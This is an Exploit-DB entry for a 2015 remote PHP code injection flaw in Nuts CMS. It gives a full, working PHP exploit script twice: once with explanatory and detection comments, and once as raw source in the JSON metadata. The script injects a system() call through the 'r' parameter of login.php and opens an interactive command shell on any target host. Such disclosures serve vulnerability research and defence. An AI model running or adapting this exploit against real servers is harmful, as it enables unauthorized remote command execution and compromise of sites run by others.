ID EDB-ID:37809
Type exploitdb
Reporter Yakir Wizman
Modified 2015-08-17T00:00:00
Description
Nuts CMS Remote PHP Code Injection / Execution. Web application exploit for the PHP platform.
<?php
# Nuts-CMS Remote PHP Code Injection / Execution 0day Exploit
#
# Nuts CMS is a content management system (CMS), which enables you to build Web sites and powerful online applications.
# Nuts CMS is an open source solution that is freely available to everyone.
#
# Discovered by Yakir Wizman
# Date 17/08/2015
# Vendor Homepage : http://www.nuts-cms.com/
# CVE : N/A
# Description : Nuts CMS is vulnerable to php code injection due to improper input validation (CWE-20, https://cwe.mitre.org/data/definitions/20.html).
###
# Exploit code:
# Report every PHP notice and warning while the script runs.
error_reporting(E_ALL);
# Message shown when the script is started from anything other than the CLI SAPI.
$error[0] = "[!] This script is intended to be launched from the cli.";
if(php_sapi_name() <> "cli")
die($error[0]);
# Two positional arguments are required: the target host and the CMS base path.
if($argc < 3) {
echo("\nUsage : php {$argv[0]} <host> <path>");
echo("\nExample: php {$argv[0]} localhost /");
die();
}
# Redundant with the $argc check above, which has already exited when either
# argument is missing.
if(isset($argv[1]) && isset($argv[2])) {
$host = $argv[1];
$path = $argv[2];
}
# Raw HTTP/1.0 request template aimed at {path}nuts/login.php. The `r` query
# parameter carries literal PHP source text: it silences error output, prints
# the marker `_nutCmsId_`, passes the base64-decoded `Cmd` request header
# ($_SERVER[HTTP_CMD]) to system(), and then stops the page.
# NOTE(review): the server-side sink is not shown on this page; the advisory
# header only states improper input validation (CWE-20). Presumably login.php
# evaluates or includes the `r` value - confirm against the CMS source.
# Detection: the request line for nuts/login.php holds an `r` value that begins
# with a PHP open tag and contains a system() call, and the response body
# contains `_nutCmsId_`. The command travels in the `Cmd` header, outside the
# request line, so it is only visible where request headers are logged.
# Mitigation: request parameters must never reach code evaluation; `r` should
# be validated against the values the login page actually expects.
$pack = "GET {$path}nuts/login.php?r=<?php+error_reporting(0);print(_nutCmsId_);system(base64_decode(\$_SERVER[HTTP_CMD]));die;+?> HTTP/1.0\r\n";
$pack.= "Host: {$host}\r\n";
# %s is a sprintf() placeholder, filled once per request inside the loop below.
$pack.= "Cmd: %s\r\n";
$pack.= "Connection: close\r\n\r\n";
# Interactive loop: one HTTP request is sent per line read from STDIN.
while(1) {
print "\nAnonymous@{$host}:~# ";
# The literal input "exit" (loose == comparison) ends the session.
if(($cmd = trim(fgets(STDIN))) == "exit")
break;
# Fills the template with the base64-encoded input, sends it, and prints
# whatever follows the `_nutCmsId_` marker in the raw response. A response
# without the marker terminates the script.
preg_match("/_nutCmsId_(.*)/s", http_send($host, sprintf($pack, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
# Sends a pre-built raw request to $host and returns the raw response.
#   $host - host name or address handed directly to fsockopen()
#   $pack - complete request text, written to the socket as-is
# Returns everything read from the socket as a single string.
# Terminates the script through die() when the connection cannot be opened.
function http_send($host, $pack) {
# Port 80 is fixed and no timeout argument is passed, so PHP's
# default_socket_timeout setting governs the connect.
if(!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}\n");
# The fwrite() result is not checked, so a short or failed write goes unnoticed.
fwrite($sock, $pack);
# Reads until end of stream; $sock is never passed to fclose() in this function.
return stream_get_contents($sock);
}
?>
{"id": "EDB-ID:37809", "hash": "25c37411ee3099bb6b85be4653cbc858", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Nuts CMS Remote PHP Code Injection / Execution", "description": "Nuts CMS Remote PHP Code Injection / Execution. Webapps exploit for php platform", "published": "2015-08-17T00:00:00", "modified": "2015-08-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/37809/", "reporter": "Yakir Wizman", "references": [], "cvelist": [], "lastseen": "2016-02-04T06:37:03", "history": [], "viewCount": 0, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-02-04T06:37:03"}, "dependencies": {"references": [], "modified": "2016-02-04T06:37:03"}, "vulnersScore": -0.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/37809/", "sourceData": "<?php\r\n# Nuts-CMS Remote PHP Code Injection / Execution 0day Exploit\r\n# \r\n# Nuts CMS is a content management system (CMS), which enables you to build Web sites and powerful online applications.\r\n# Nuts CMS is an open source solution that is freely available to everyone.\r\n#\r\n# Discovered by Yakir Wizman\r\n# Date 17/08/2015\r\n# Vendor Homepage\t: http://www.nuts-cms.com/\r\n# CVE\t\t\t\t: N/A\r\n# Description\t\t: Nuts CMS is vulnerable to php code injection due to improper input validation (CWE-20, https://cwe.mitre.org/data/definitions/20.html).\r\n###\r\n# Exploit code:\r\n\r\nerror_reporting(E_ALL);\r\n\r\n$error[0] = \"[!] 
This script is intended to be launched from the cli.\";\r\n \r\nif(php_sapi_name() <> \"cli\")\r\n\tdie($error[0]);\r\n \r\nif($argc < 3) {\r\n\techo(\"\\nUsage : php {$argv[0]} <host> <path>\");\r\n\techo(\"\\nExample: php {$argv[0]} localhost /\");\r\n\tdie();\r\n}\r\n\r\nif(isset($argv[1]) && isset($argv[2])) {\r\n\t$host = $argv[1];\r\n\t$path = $argv[2];\r\n}\r\n\r\n$pack = \"GET {$path}nuts/login.php?r=<?php+error_reporting(0);print(_nutCmsId_);system(base64_decode(\\$_SERVER[HTTP_CMD]));die;+?> HTTP/1.0\\r\\n\";\r\n$pack.= \"Host: {$host}\\r\\n\";\r\n$pack.= \"Cmd: %s\\r\\n\";\r\n$pack.= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nwhile(1) {\r\n\tprint \"\\nAnonymous@{$host}:~# \";\r\n if(($cmd = trim(fgets(STDIN))) == \"exit\")\r\n\t\tbreak;\r\n\tpreg_match(\"/_nutCmsId_(.*)/s\", http_send($host, sprintf($pack, base64_encode($cmd))), $m) ? print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\nfunction http_send($host, $pack) {\r\n\tif(!($sock = fsockopen($host, 80)))\r\n\t\tdie(\"\\n[-] No response from {$host}\\n\");\r\n\tfwrite($sock, $pack);\r\n\treturn stream_get_contents($sock);\r\n}\r\n?>", "osvdbidlist": ["126452"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}